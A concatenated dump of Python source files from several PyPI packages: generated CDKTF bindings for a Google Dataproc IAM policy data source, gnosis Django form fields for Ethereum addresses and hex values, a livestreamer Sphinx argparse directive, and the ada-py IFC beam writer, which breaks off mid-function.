    def policy_data(self) -> builtins.str:
        return typing.cast(builtins.str, jsii.get(self, "policyData"))

    # --- raw configured inputs (None when unset) -----------------------------

    @builtins.property
    @jsii.member(jsii_name="clusterInput")
    def cluster_input(self) -> typing.Optional[builtins.str]:
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "clusterInput"))

    @builtins.property
    @jsii.member(jsii_name="idInput")
    def id_input(self) -> typing.Optional[builtins.str]:
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "idInput"))

    @builtins.property
    @jsii.member(jsii_name="projectInput")
    def project_input(self) -> typing.Optional[builtins.str]:
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "projectInput"))

    @builtins.property
    @jsii.member(jsii_name="regionInput")
    def region_input(self) -> typing.Optional[builtins.str]:
        return typing.cast(typing.Optional[builtins.str], jsii.get(self, "regionInput"))

    # --- read/write configuration attributes ---------------------------------

    @builtins.property
    @jsii.member(jsii_name="cluster")
    def cluster(self) -> builtins.str:
        return typing.cast(builtins.str, jsii.get(self, "cluster"))

    @cluster.setter
    def cluster(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__67280ce663d29e99ee680c97ad49e21873bf5297e614bbfa1d689f303ab2d9de)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "cluster", value)

    @builtins.property
    @jsii.member(jsii_name="id")
    def id(self) -> builtins.str:
        return typing.cast(builtins.str, jsii.get(self, "id"))

    @id.setter
    def id(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__0266c902d95c3d72fa1317421c12f5cf1bc00a01fa73ed24a7a26b9e996392d3)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "id", value)

    @builtins.property
    @jsii.member(jsii_name="project")
    def project(self) -> builtins.str:
        return typing.cast(builtins.str, jsii.get(self, "project"))

    @project.setter
    def project(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__1312e1730d0d6933657866c713a1fdd67708e8ba1b651ff6dfaaef802b69b03f)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "project", value)

    @builtins.property
    @jsii.member(jsii_name="region")
    def region(self) -> builtins.str:
        return typing.cast(builtins.str, jsii.get(self, "region"))

    @region.setter
    def region(self, value: builtins.str) -> None:
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__63425cc9344a331ec9c0bbbc56dde35d3e72dd90dff0cb50fc7fa47f4baef589)
            check_type(argname="argument value", value=value, expected_type=type_hints["value"])
        jsii.set(self, "region", value)
@jsii.data_type(
    jsii_type="@cdktf/provider-google-beta.dataGoogleDataprocClusterIamPolicy.DataGoogleDataprocClusterIamPolicyConfig",
    jsii_struct_bases=[_cdktf_9a9027ec.TerraformMetaArguments],
    name_mapping={
        "connection": "connection",
        "count": "count",
        "depends_on": "dependsOn",
        "for_each": "forEach",
        "lifecycle": "lifecycle",
        "provider": "provider",
        "provisioners": "provisioners",
        "cluster": "cluster",
        "id": "id",
        "project": "project",
        "region": "region",
    },
)
class DataGoogleDataprocClusterIamPolicyConfig(_cdktf_9a9027ec.TerraformMetaArguments):
    # NOTE: jsii-generated immutable config struct; values are stored in the
    # internal _values dict and exposed through read-only properties. Do not
    # edit structure by hand — it is introspected by jsii at runtime.

    def __init__(
        self,
        *,
        connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
        count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
        depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
        for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
        lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
        provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
        provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
        cluster: builtins.str,
        id: typing.Optional[builtins.str] = None,
        project: typing.Optional[builtins.str] = None,
        region: typing.Optional[builtins.str] = None,
    ) -> None:
        '''
        :param connection:
        :param count:
        :param depends_on:
        :param for_each:
        :param lifecycle:
        :param provider:
        :param provisioners:
        :param cluster: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#cluster DataGoogleDataprocClusterIamPolicy#cluster}.
        :param id: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#id DataGoogleDataprocClusterIamPolicy#id}. Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2. If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
        :param project: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#project DataGoogleDataprocClusterIamPolicy#project}.
        :param region: Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#region DataGoogleDataprocClusterIamPolicy#region}.
        '''
        # Accept a plain dict for lifecycle and coerce it to the struct type.
        if isinstance(lifecycle, dict):
            lifecycle = _cdktf_9a9027ec.TerraformResourceLifecycle(**lifecycle)
        if __debug__:
            type_hints = typing.get_type_hints(_typecheckingstub__9f3314323e9558f8280eaa333ea022b63e82943b2d882379b87f673a9709bb3f)
            check_type(argname="argument connection", value=connection, expected_type=type_hints["connection"])
            check_type(argname="argument count", value=count, expected_type=type_hints["count"])
            check_type(argname="argument depends_on", value=depends_on, expected_type=type_hints["depends_on"])
            check_type(argname="argument for_each", value=for_each, expected_type=type_hints["for_each"])
            check_type(argname="argument lifecycle", value=lifecycle, expected_type=type_hints["lifecycle"])
            check_type(argname="argument provider", value=provider, expected_type=type_hints["provider"])
            check_type(argname="argument provisioners", value=provisioners, expected_type=type_hints["provisioners"])
            check_type(argname="argument cluster", value=cluster, expected_type=type_hints["cluster"])
            check_type(argname="argument id", value=id, expected_type=type_hints["id"])
            check_type(argname="argument project", value=project, expected_type=type_hints["project"])
            check_type(argname="argument region", value=region, expected_type=type_hints["region"])
        # Only explicitly provided (non-None) values are stored.
        self._values: typing.Dict[builtins.str, typing.Any] = {
            "cluster": cluster,
        }
        if connection is not None:
            self._values["connection"] = connection
        if count is not None:
            self._values["count"] = count
        if depends_on is not None:
            self._values["depends_on"] = depends_on
        if for_each is not None:
            self._values["for_each"] = for_each
        if lifecycle is not None:
            self._values["lifecycle"] = lifecycle
        if provider is not None:
            self._values["provider"] = provider
        if provisioners is not None:
            self._values["provisioners"] = provisioners
        if id is not None:
            self._values["id"] = id
        if project is not None:
            self._values["project"] = project
        if region is not None:
            self._values["region"] = region

    @builtins.property
    def connection(
        self,
    ) -> typing.Optional[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, _cdktf_9a9027ec.WinrmProvisionerConnection]]:
        '''
        :stability: experimental
        '''
        result = self._values.get("connection")
        return typing.cast(typing.Optional[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, _cdktf_9a9027ec.WinrmProvisionerConnection]], result)

    @builtins.property
    def count(
        self,
    ) -> typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]]:
        '''
        :stability: experimental
        '''
        result = self._values.get("count")
        return typing.cast(typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]], result)

    @builtins.property
    def depends_on(
        self,
    ) -> typing.Optional[typing.List[_cdktf_9a9027ec.ITerraformDependable]]:
        '''
        :stability: experimental
        '''
        result = self._values.get("depends_on")
        return typing.cast(typing.Optional[typing.List[_cdktf_9a9027ec.ITerraformDependable]], result)

    @builtins.property
    def for_each(self) -> typing.Optional[_cdktf_9a9027ec.ITerraformIterator]:
        '''
        :stability: experimental
        '''
        result = self._values.get("for_each")
        return typing.cast(typing.Optional[_cdktf_9a9027ec.ITerraformIterator], result)

    @builtins.property
    def lifecycle(self) -> typing.Optional[_cdktf_9a9027ec.TerraformResourceLifecycle]:
        '''
        :stability: experimental
        '''
        result = self._values.get("lifecycle")
        return typing.cast(typing.Optional[_cdktf_9a9027ec.TerraformResourceLifecycle], result)

    @builtins.property
    def provider(self) -> typing.Optional[_cdktf_9a9027ec.TerraformProvider]:
        '''
        :stability: experimental
        '''
        result = self._values.get("provider")
        return typing.cast(typing.Optional[_cdktf_9a9027ec.TerraformProvider], result)

    @builtins.property
    def provisioners(
        self,
    ) -> typing.Optional[typing.List[typing.Union[_cdktf_9a9027ec.FileProvisioner, _cdktf_9a9027ec.LocalExecProvisioner, _cdktf_9a9027ec.RemoteExecProvisioner]]]:
        '''
        :stability: experimental
        '''
        result = self._values.get("provisioners")
        return typing.cast(typing.Optional[typing.List[typing.Union[_cdktf_9a9027ec.FileProvisioner, _cdktf_9a9027ec.LocalExecProvisioner, _cdktf_9a9027ec.RemoteExecProvisioner]]], result)

    @builtins.property
    def cluster(self) -> builtins.str:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#cluster DataGoogleDataprocClusterIamPolicy#cluster}.'''
        result = self._values.get("cluster")
        assert result is not None, "Required property 'cluster' is missing"
        return typing.cast(builtins.str, result)

    @builtins.property
    def id(self) -> typing.Optional[builtins.str]:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#id DataGoogleDataprocClusterIamPolicy#id}.

        Please be aware that the id field is automatically added to all resources in Terraform providers using a Terraform provider SDK version below 2.
        If you experience problems setting this value it might not be settable. Please take a look at the provider documentation to ensure it should be settable.
        '''
        result = self._values.get("id")
        return typing.cast(typing.Optional[builtins.str], result)

    @builtins.property
    def project(self) -> typing.Optional[builtins.str]:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#project DataGoogleDataprocClusterIamPolicy#project}.'''
        result = self._values.get("project")
        return typing.cast(typing.Optional[builtins.str], result)

    @builtins.property
    def region(self) -> typing.Optional[builtins.str]:
        '''Docs at Terraform Registry: {@link https://registry.terraform.io/providers/hashicorp/google-beta/4.80.0/docs/data-sources/google_dataproc_cluster_iam_policy#region DataGoogleDataprocClusterIamPolicy#region}.'''
        result = self._values.get("region")
        return typing.cast(typing.Optional[builtins.str], result)

    # Value-based equality over the stored _values dict.
    def __eq__(self, rhs: typing.Any) -> builtins.bool:
        return isinstance(rhs, self.__class__) and rhs._values == self._values

    def __ne__(self, rhs: typing.Any) -> builtins.bool:
        return not (rhs == self)

    def __repr__(self) -> str:
        return "DataGoogleDataprocClusterIamPolicyConfig(%s)" % ", ".join(
            k + "=" + repr(v) for k, v in self._values.items()
        )
# Public API of this generated module.
__all__ = [
    "DataGoogleDataprocClusterIamPolicy",
    "DataGoogleDataprocClusterIamPolicyConfig",
]

# jsii convention: hide non-public machinery from the module namespace.
publication.publish()
def _typecheckingstub__cbdfc1f5a161228c95adde0ef989c835403cd8a2a6d7d35d4a6f667c9742957c(
    scope: _constructs_77d1e7e8.Construct,
    id_: builtins.str,
    *,
    cluster: builtins.str,
    id: typing.Optional[builtins.str] = None,
    project: typing.Optional[builtins.str] = None,
    region: typing.Optional[builtins.str] = None,
    connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
    count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
    depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
    for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
    lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
    provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
    provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
) -> None:
    """Type checking stubs"""
    # Generated placeholder: only the signature matters — it is read back via
    # typing.get_type_hints() in DataGoogleDataprocClusterIamPolicy.__init__.
    pass
def _typecheckingstub__67280ce663d29e99ee680c97ad49e21873bf5297e614bbfa1d689f303ab2d9de(
    value: builtins.str,
) -> None:
    """Type checking stubs"""
    # Generated placeholder for the `cluster` setter's argument validation.
    pass
def _typecheckingstub__0266c902d95c3d72fa1317421c12f5cf1bc00a01fa73ed24a7a26b9e996392d3(
    value: builtins.str,
) -> None:
    """Type checking stubs"""
    # Generated placeholder for the `id` setter's argument validation.
    pass
def _typecheckingstub__1312e1730d0d6933657866c713a1fdd67708e8ba1b651ff6dfaaef802b69b03f(
    value: builtins.str,
) -> None:
    """Type checking stubs"""
    # Generated placeholder for the `project` setter's argument validation.
    pass
def _typecheckingstub__63425cc9344a331ec9c0bbbc56dde35d3e72dd90dff0cb50fc7fa47f4baef589(
    value: builtins.str,
) -> None:
    """Type checking stubs"""
    # Generated placeholder for the `region` setter's argument validation.
    pass
def _typecheckingstub__9f3314323e9558f8280eaa333ea022b63e82943b2d882379b87f673a9709bb3f(
    *,
    connection: typing.Optional[typing.Union[typing.Union[_cdktf_9a9027ec.SSHProvisionerConnection, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.WinrmProvisionerConnection, typing.Dict[builtins.str, typing.Any]]]] = None,
    count: typing.Optional[typing.Union[jsii.Number, _cdktf_9a9027ec.TerraformCount]] = None,
    depends_on: typing.Optional[typing.Sequence[_cdktf_9a9027ec.ITerraformDependable]] = None,
    for_each: typing.Optional[_cdktf_9a9027ec.ITerraformIterator] = None,
    lifecycle: typing.Optional[typing.Union[_cdktf_9a9027ec.TerraformResourceLifecycle, typing.Dict[builtins.str, typing.Any]]] = None,
    provider: typing.Optional[_cdktf_9a9027ec.TerraformProvider] = None,
    provisioners: typing.Optional[typing.Sequence[typing.Union[typing.Union[_cdktf_9a9027ec.FileProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.LocalExecProvisioner, typing.Dict[builtins.str, typing.Any]], typing.Union[_cdktf_9a9027ec.RemoteExecProvisioner, typing.Dict[builtins.str, typing.Any]]]]] = None,
    cluster: builtins.str,
    id: typing.Optional[builtins.str] = None,
    project: typing.Optional[builtins.str] = None,
    region: typing.Optional[builtins.str] = None,
) -> None:
    """Type checking stubs"""
    # Generated placeholder mirroring DataGoogleDataprocClusterIamPolicyConfig.__init__.
    pass
|
PypiClean
|
/safe_pls_py-5.4.3-py3-none-any.whl/gnosis/eth/django/forms.py
|
import binascii
from typing import Any, Optional
from django import forms
from django.core import exceptions
from django.core.exceptions import ValidationError
from django.utils.translation import gettext as _
from hexbytes import HexBytes
from gnosis.eth.utils import fast_is_checksum_address
class EthereumAddressFieldForm(forms.CharField):
    """Form field accepting only EIP-55 checksummed Ethereum addresses."""

    default_error_messages = {
        "invalid": _("Enter a valid checksummed Ethereum Address."),
    }

    def prepare_value(self, value):
        # Render the stored value unchanged.
        return value

    def to_python(self, value):
        cleaned = super().to_python(value)
        if cleaned in self.empty_values:
            return None
        if fast_is_checksum_address(cleaned):
            return cleaned
        raise ValidationError(self.error_messages["invalid"], code="invalid")
class HexFieldForm(forms.CharField):
    """Form field that parses a hexadecimal string into :class:`HexBytes`."""

    default_error_messages = {
        "invalid": _("Enter a valid hexadecimal."),
    }

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Normalise "no value" to None instead of CharField's default "".
        self.empty_value = None

    def prepare_value(self, value: memoryview) -> str:
        """Render stored binary data as a 0x-prefixed hex string."""
        if value:
            return "0x" + bytes(value).hex()
        else:
            return ""

    def to_python(self, value: Optional[Any]) -> Optional[HexBytes]:
        """Convert user input to HexBytes; raise ValidationError on bad hex."""
        if value in self.empty_values:
            return self.empty_value
        try:
            if isinstance(value, str):
                value = value.strip()
            return HexBytes(value)
        except (binascii.Error, TypeError, ValueError) as exc:
            # Bug fix: chain the underlying decoding error explicitly
            # (PEP 3134) so the real cause is preserved for debugging.
            raise exceptions.ValidationError(
                self.error_messages["invalid"],
                code="invalid",
                params={"value": value},
            ) from exc
class Keccak256FieldForm(HexFieldForm):
    """HexFieldForm variant that additionally enforces a 32-byte value."""

    default_error_messages = {
        "invalid": _('"%(value)s" is not a valid keccak256 hash.'),
        "length": _('"%(value)s" keccak256 hash should be 32 bytes.'),
    }

    def prepare_value(self, value: str) -> str:
        # Keccak field already returns a hex str
        return value

    def to_python(self, value: Optional[Any]) -> HexBytes:
        parsed: Optional[HexBytes] = super().to_python(value)
        if not parsed or len(parsed) == 32:
            return parsed
        raise ValidationError(
            self.error_messages["length"],
            code="length",
            params={"value": parsed.hex()},
        )
|
PypiClean
|
/livestreamer-1.12.2.tar.gz/livestreamer-1.12.2/docs/ext_argparse.py
|
import argparse
import re
from collections import namedtuple
from textwrap import dedent
from docutils import nodes
from docutils.parsers.rst.directives import unchanged
from docutils.statemachine import ViewList
from sphinx.util.nodes import nested_parse_with_titles
from sphinx.util.compat import Directive
# The real ArgumentParser, restored after the target module has been imported
# (see get_parser).
_ArgumentParser = argparse.ArgumentParser
# Lightweight record of one add_argument() call.
_Argument = namedtuple("Argument", ["args", "options"])
# Patterns used to rewrite argparse help text into reST (see ArgparseDirective).
_block_re = re.compile(r":\n{2}\s{2}")
_default_re = re.compile(r"Default is (.+)\.\n")
_note_re = re.compile(r"Note: (.*)\n\n", re.DOTALL)
_option_re = re.compile(r"(--[\w-]+)")
class ArgumentParser(object):
    """Recording stand-in for :class:`argparse.ArgumentParser`.

    Instead of building a real parser it captures constructor arguments,
    argument groups and add_argument() calls so the directive can render
    them as documentation.
    """

    def __init__(self, *args, **kwargs):
        self.args = args
        self.kwargs = kwargs
        self.groups = []
        self.arguments = []

    def add_argument(self, *args, **options):
        """Record one argument unless its help is argparse.SUPPRESS."""
        if options.get("help") != argparse.SUPPRESS:
            self.arguments.append(_Argument(args, options))

    def add_argument_group(self, *args, **options):
        """Create, record and return a nested recording parser for a group."""
        group = ArgumentParser(*args, **options)
        self.groups.append(group)
        return group
def get_parser(module_name, attr):
    """Import *module_name* with argparse patched and return its *attr*.

    argparse.ArgumentParser is temporarily replaced by the recording stub so
    that importing the module captures its CLI definition instead of building
    a real parser.
    """
    argparse.ArgumentParser = ArgumentParser
    try:
        module = __import__(module_name, globals(), locals(), [attr])
    finally:
        # Bug fix: restore the real class even if the import raises;
        # otherwise the monkeypatch leaked into every later argparse user.
        argparse.ArgumentParser = _ArgumentParser
    return getattr(module, attr)
def indent(value, length=4):
    """Return *value* with every line prefixed by *length* spaces."""
    pad = " " * length
    shifted = [pad + line for line in value.splitlines()]
    return "\n".join(shifted)
class ArgparseDirective(Directive):
    """Sphinx directive rendering a module's argparse definition as reST.

    Usage::

        .. argparse::
           :module: some.module
           :attr: parser_attribute
    """

    has_content = True
    option_spec = {
        "module": unchanged,
        "attr": unchanged,
    }

    def process_help(self, help):
        """Convert one argparse help string into indented reST markup."""
        # Dedent the help to make sure we are always dealing with
        # non-indented text.
        help = dedent(help)
        # Create simple blocks.
        help = _block_re.sub("::\n\n  ", help)
        # Boldify the default value.
        help = _default_re.sub(r"Default is: **\1**.\n", help)
        # Create note directives from "Note: " paragraphs.
        help = _note_re.sub(
            lambda m: ".. note::\n\n" + indent(m.group(1)) + "\n\n",
            help
        )
        # Replace option references with links.
        help = _option_re.sub(
            lambda m: (
                ":option:`{0}`".format(m.group(1))
                if m.group(1) in self._available_options
                else m.group(1)
            ),
            help
        )
        return indent(help)

    def generate_group_rst(self, group):
        """Yield reST lines (``.. option::`` entries) for *group*'s arguments."""
        for arg in group.arguments:
            help = arg.options.get("help")
            metavar = arg.options.get("metavar")
            if isinstance(metavar, tuple):
                metavar = " ".join(metavar)
            if metavar:
                # nargs="?" means the value itself is optional -> [METAVAR].
                optional = arg.options.get("nargs") == "?"
                if optional:
                    metavar = "[{0}]".format(metavar)
                options = []
                for a in arg.args:
                    if a.startswith("-"):
                        options.append("{0} {1}".format(a, metavar))
                    else:
                        options.append(metavar)
            else:
                options = arg.args
            yield ".. option:: {0}".format(", ".join(options))
            yield ""
            # NOTE(review): `help` may be None for arguments declared without
            # help=; process_help() would then crash in dedent() — confirm all
            # documented parsers always provide help text.
            for line in self.process_help(help).split("\n"):
                yield line
            yield ""

    def generate_parser_rst(self, parser):
        """Yield a titled reST section for every argument group of *parser*."""
        for group in parser.groups:
            title = group.args[0]
            yield ""
            yield title
            yield "^" * len(title)
            for line in self.generate_group_rst(group):
                yield line

    def run(self):
        """Directive entry point: import the parser and parse generated reST."""
        module = self.options.get("module")
        attr = self.options.get("attr")
        parser = get_parser(module, attr)
        # Collect all option strings first so process_help can cross-link them.
        self._available_options = []
        for group in parser.groups:
            for arg in group.arguments:
                self._available_options += arg.args
        node = nodes.section()
        node.document = self.state.document
        result = ViewList()
        for line in self.generate_parser_rst(parser):
            result.append(line, "argparse")
        nested_parse_with_titles(self.state, result, node)
        return node.children
def setup(app):
    """Sphinx extension entry point: register the ``argparse`` directive."""
    app.add_directive("argparse", ArgparseDirective)
|
PypiClean
|
/ada-py-0.0.40a4.tar.gz/ada-py-0.0.40a4/src/ada/ifc/write/write_beams.py
|
from __future__ import annotations
from dataclasses import dataclass
from typing import TYPE_CHECKING
import numpy as np
from ada import Beam, CurvePoly, CurveRevolve
from ada.config import Settings
from ada.core.constants import O
from ada.ifc.utils import (
add_colour,
convert_bm_jusl_to_ifc,
create_guid,
create_ifc_placement,
create_local_placement,
ifc_dir,
ifc_p,
to_real,
)
from ada.ifc.write.write_curves import write_curve_poly
if TYPE_CHECKING:
from ifcopenshell import file as ifile
from ada.ifc.store import IfcStore
def write_ifc_beam(ifc_store: IfcStore, beam: Beam):
    """Write *beam* into the IFC file held by *ifc_store*; return the IfcBeam."""
    writer = IfcBeamWriter(ifc_store)
    return writer.create_ifc_beam(beam)
@dataclass
class IfcBeamWriter:
    """Writes ada :class:`Beam` objects into an IFC file via the shared store."""

    ifc_store: IfcStore

    def create_ifc_beam(self, beam: Beam):
        """Create the IfcBeam entity (axis + body representations) for *beam*.

        :raises ValueError: when the beam has no parent, its curve type is
            unrecognized, or its beam type is missing from the store.
        """
        if beam.parent is None:
            raise ValueError("Parent cannot be None for IFC export")
        f = self.ifc_store.f
        owner_history = self.ifc_store.owner_history
        profile = self.ifc_store.get_profile_def(beam.section)
        # Pick the geometry builder matching the beam's curve type.
        # NOTE(review): verify each helper returns values in the
        # (axis, body, placement) order unpacked here.
        if isinstance(beam.curve, CurveRevolve):
            axis, body, loc_plac = create_revolved_beam(beam, f, profile)
        elif isinstance(beam.curve, CurvePoly):
            axis, body, loc_plac = create_polyline_beam(beam, f, profile)
        else:
            if beam.curve is not None:
                raise ValueError(f'Unrecognized beam.curve "{type(beam.curve)}"')
            axis, body, loc_plac = extrude_straight_beam(beam, f, profile)
        prod_def_shp = f.create_entity("IfcProductDefinitionShape", None, None, (axis, body))
        ifc_beam = f.create_entity(
            "IfcBeam",
            GlobalId=beam.guid,
            OwnerHistory=owner_history,
            Name=beam.name,
            Description=beam.section.sec_str,
            ObjectType="Beam",
            ObjectPlacement=loc_plac,
            Representation=prod_def_shp,
        )
        # Attach the beam to an existing IfcRelDefinesByType for its beam type
        # if one exists; otherwise create a fresh relationship.
        found_existing_relationship = False
        beam_type = self.ifc_store.get_beam_type(beam.section)
        if beam_type is None:
            raise ValueError()
        for ifcrel in f.by_type("IfcRelDefinesByType"):
            if ifcrel.RelatingType == beam_type:
                ifcrel.RelatedObjects = tuple([*ifcrel.RelatedObjects, ifc_beam])
                found_existing_relationship = True
                break
        if found_existing_relationship is False:
            f.create_entity(
                "IfcRelDefinesByType",
                GlobalId=create_guid(),
                OwnerHistory=owner_history,
                Name=beam.section.type.value,
                Description=None,
                RelatedObjects=[ifc_beam],
                RelatingType=beam_type,
            )
        self.add_material_assignment(beam, ifc_beam)
        return ifc_beam

    def add_material_assignment(self, beam: Beam, ifc_beam):
        """Associate *ifc_beam* with a material profile set built from the
        beam's section and material; returns the IfcMaterialProfileSet."""
        sec = beam.section
        mat = beam.material
        ifc_store = self.ifc_store
        f = ifc_store.f
        # The material relationship entity was created earlier under the
        # material's guid; unwrap the actual IfcMaterial from it.
        ifc_mat_rel = ifc_store.f.by_guid(mat.guid)
        ifc_mat = ifc_mat_rel.RelatingMaterial
        ifc_profile = ifc_store.get_profile_def(beam.section)
        mat_profile = f.createIfcMaterialProfile(
            sec.name, "A material profile", ifc_mat, ifc_profile, None, "LoadBearing"
        )
        mat_profile_set = f.createIfcMaterialProfileSet(sec.name, None, [mat_profile], None)
        mat_usage = f.create_entity("IfcMaterialProfileSetUsage", mat_profile_set, convert_bm_jusl_to_ifc(beam))
        ifc_store.writer.create_rel_associates_material(create_guid(), mat_usage, [ifc_beam])
        ifc_store.writer.associate_elem_with_material(beam.material, ifc_beam)
        return mat_profile_set
def extrude_straight_beam(beam: Beam, f: ifile, profile):
    """Create IFC geometry for a straight beam by extruding *profile* along local +Z.

    Builds an IfcExtrudedAreaSolid (or IfcExtrudedAreaSolidTapered when the beam
    has a differing taper section) plus a polyline axis representation, and a
    local placement that orients the extrusion along the beam's x-vector.

    Returns a 3-tuple ``(body, axis, loc_plac)`` of IfcShapeRepresentation,
    IfcShapeRepresentation and IfcLocalPlacement.
    NOTE(review): the caller visible in this file unpacks the result as
    ``axis, body, loc_plac`` — the first two names are swapped relative to this
    return order. The representations end up in the product definition shape
    either way, but confirm which order is intended.
    """
    # Extrusion is always along local +Z; the real orientation is applied via
    # the IfcAxis2Placement3D built from the beam vectors further down.
    extrude_dir = ifc_dir(f, (0.0, 0.0, 1.0))
    parent = f.by_guid(beam.parent.guid)
    a = beam.parent.get_assembly()
    global_placement = create_local_placement(f, relative_to=parent.ObjectPlacement)
    e1 = (0.0, 0.0, 0.0)
    vec = beam.xvec
    yvec = beam.yvec
    # Apply the end-1 eccentricity offset only when the export settings ask for it.
    if Settings.model_export.include_ecc and beam.e1 is not None:
        e1 = beam.e1
        vec = beam.xvec_e
    # Tapered beams need a second profile for the far end of the extrusion.
    profile_e = None
    if beam.taper is not None and beam.section != beam.taper:
        profile_e = f.by_guid(beam.taper.guid)
    # Transform coordinates to local coords
    p1 = tuple([float(x) + float(e1[i]) for i, x in enumerate(beam.n1.p.copy())])
    p2 = p1 + np.array([0, 0, 1]) * beam.length
    p1_ifc = f.create_entity("IfcCartesianPoint", to_real(p1))
    p2_ifc = f.create_entity("IfcCartesianPoint", to_real(p2))
    ifc_polyline = f.create_entity("IfcPolyLine", [p1_ifc, p2_ifc])
    global_origin = f.createIfcCartesianPoint(O)
    ifc_axis2plac3d = f.create_entity("IfcAxis2Placement3D", global_origin, None, None)
    if profile_e is not None:
        extrude_area_solid = f.create_entity(
            "IfcExtrudedAreaSolidTapered", profile, ifc_axis2plac3d, extrude_dir, beam.length, profile_e
        )
    else:
        extrude_area_solid = f.create_entity("IfcExtrudedAreaSolid", profile, ifc_axis2plac3d, extrude_dir, beam.length)
    # Add colour
    if beam.colour is not None:
        add_colour(f, extrude_area_solid, str(beam.colour), beam.colour)
    body_context = a.ifc_store.get_context("Body")
    axis_context = a.ifc_store.get_context("Axis")
    # Orientation: Z along the (possibly eccentric) beam x-vector, X along yvec.
    ax23d = f.create_entity("IfcAxis2Placement3D", p1_ifc, ifc_dir(f, vec), ifc_dir(f, yvec))
    loc_plac = f.create_entity("IfcLocalPlacement", global_placement, ax23d)
    body = f.create_entity("IfcShapeRepresentation", body_context, "Body", "SweptSolid", [extrude_area_solid])
    axis = f.create_entity("IfcShapeRepresentation", axis_context, "Axis", "Curve3D", [ifc_polyline])
    return body, axis, loc_plac
def create_revolved_beam(beam: Beam, f: "ifile", profile):
    """Create IFC geometry for a beam whose centreline is a revolved (arc) curve.

    Returns ``(body, axis, placement)``: the swept-solid body representation,
    the trimmed-curve axis representation and the local placement at the
    curve's start point.
    """
    assembly = beam.parent.get_assembly()
    body_context = assembly.ifc_store.get_context("Body")
    axis_context = assembly.ifc_store.get_context("Axis")
    arc: CurveRevolve = beam.curve
    trimmed_curve = create_ifc_trimmed_curve(arc, f)
    placement = create_local_placement(f, arc.p1, (0, 0, 1))
    # Revolve the section profile about the curve's rotation axis by its sweep angle.
    solid = create_ifcrevolveareasolid(f, profile, placement, arc.p1, arc.rot_axis, np.deg2rad(arc.angle))
    axis = f.create_entity("IfcShapeRepresentation", axis_context, "Axis", "Curve3D", [trimmed_curve])
    body = f.create_entity("IfcShapeRepresentation", body_context, "Body", "SweptSolid", [solid])
